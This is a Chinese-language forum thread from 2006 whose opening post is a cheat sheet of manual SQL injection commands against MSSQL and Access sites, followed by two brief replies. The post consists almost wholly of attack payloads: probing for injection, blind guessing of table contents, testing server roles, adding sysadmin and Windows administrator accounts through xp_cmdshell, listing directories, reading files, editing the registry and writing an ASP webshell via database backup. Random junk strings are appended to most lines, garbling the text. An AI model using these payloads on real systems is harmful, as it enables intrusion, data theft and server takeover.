社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4060阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 IKV:J9  
  2.初步判断是否是mssql ;and user>0 6M758K6v  
zE NlL  
  3.注入参数是字符'and [查询条件] and ''=' Ev;ocb,  
vVi))%&S(  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' g$ oe00b  
)z#M_[zC>  
  5.判断数据库系统 ]w=6.LzO*  
juuV3et  
  ;and (select count(*) from sysobjects)>0 mssql iy_\1jB0  
\3@AC7  
  ;and (select count(*) from msysobjects)>0 access |+MV%QG;  
5=.EngG  
q#~]Hp=W5  
35[8XD  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 XK5qE"  
= A !;`G  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Soa5TM  
8oj-5|ct  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 MrA&xM  
!*gTC1bvB  
  9.(1)猜字段的ascii值(access) 21BlLz  
88ydAx#P  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ^L<*ggw  
6uijxia  
  (2)猜字段的ascii值(mssql) 5Y&s+|   
z<F.0~)jb  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 AQ 5CrYb  
lAwOp  
  10.测试权限结构(mssql) d>Z{TFY  
n'#(iW)f  
 ,JcQp=g  
E@_M|=p&  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- nJ4CXSdE  
e1RtoNF^  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ;U|^Tsuc`  
h?:lO3)TL=  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- df7z& {R  
THmX=K4=?  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ZK[S'(6q  
}hFjl4`xa  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- E5M*Gs  
),-4\!7  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 6 tbH(  
nV0"q|0K;  
  ;and 1=(select IS_MEMBER('db_owner'));-- {Z_Pry$6  
I/s?] v  
/.\$%bua  
66%#$WH#  
  11.添加mssql和系统的帐户  F%6`D  
X3:-+]6,d  
  ;exec master.dbo.sp_addlogin username;-- j]"Yz t~u  
  ;exec master.dbo.sp_password null,username,password;-- UP]J `\$o  
m GWT</=[$  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- "l&sDh%Lk<  
&0 VM <  
  ;exec master.dbo.xp_cmdshell 'net user username password {=,?]Z+  
rY>{L6d  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 15r<n  
` m`Sl[6  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- Iy](?b  
E$FXs~a  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- `oh'rm3'8  
$s hlNW\  
zy#E qv  
gT R:9E:B  
  12.(1)遍历目录 NDRk%_Eu(  
L$`!~z 1  
  ;create table dirs(paths varchar(100), id int) A]{8 =  
&Sc}3UI/F  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' c(bh i  
y= I LA  
  ;and (select top 1 paths from dirs)>0 @Ns^?#u~   
0rT-8iJp4P  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) flLC\   
J680|\ER  
cmu5KeH  
Fa9]!bW  
  (2)遍历目录 H+; _fd  
sf?D4UdIH  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--  -[a0\H  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 `ge{KB;*n#  
d*1@lmV*  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 / vge@bsE  
b=QO^  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 odquAqn  
0}Xkj)R,  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 1H @GwQ|<=  
5jg^12EP  
@)m+O#a  
U$pHfNTH  
  13.mssql中的存储过程 awXL}m[_!  
{P(Z{9u%  
  xp_regenumvalues 注册表根键, 子键 -?!Z/#i4  
/+J?Ep(_  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 F#iLMO&Q  
b9OT~i=S|  
  xp_regread 根键,子键,键值名 @yB!?x  
g B<p  
  ;exec xp_regread tGD$cBE  
;'pEzz?k"  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 g?i_10Xlp  
`a2Oj@jP  
  xp_regwrite 根键,子键, 值名, 值类型, 值 C>@~W(IE  
-2tX 15,  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 _q=$L eO5  
&tQ,2RT  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 'mug,jM  
m{x!uq  
  xp_regdeletevalue 根键,子键,值名 uwWfL32  
mb?DnP,z  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 i2$U##-ro]  
d Z"bc]z{  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 dp2".  
bK("8T\?  
S_6`.@B}  
7esG$sVj(  
  14.mssql的backup创建webshell $K,rVTU  
2X)E3V/*  
  use model Z[AJat@H  
XT= #+  
  create table cmd(str image); 4lb3quY$Us  
rg_-gZl8&z  
  insert into cmd(str) values (''); ^=D77 jS  
_ZD)#?  
  backup database model to disk='c:\l.asp'; +B_q? 6pR  
Roy`HU ;0a  
rQ*'2Zf'<  
ui70|  
  15.mssql内置函数 P}&7G-  
0} liK  
  ;and (select @@version)>0 获得Windows的版本号 |RAi6;  
ozkN&0  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa rgIJ]vmy<H  
J}`K&DtM9  
  ;and (select user_name())>0 爆当前系统的连接用户 Ua V9T:)x  
Nf0b?jn-  
  ;and (select db_name())>0 得到当前连接的数据库 /n?5J`6  
m2{z  
tJ.LPgfZ  
~@BV  
  16.简洁的webshell vo uQ.utl  
=[t([DG  
  use model U`<EpO{j|  
Fdu0?H2TL  
  create table cmd(str image); yKOf]m>#  
5&2=;?EO  
  insert into cmd(str) values (''); `W?aq]4x5  
2;[75(l6|}  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
10+5=?,请输入中文答案:十五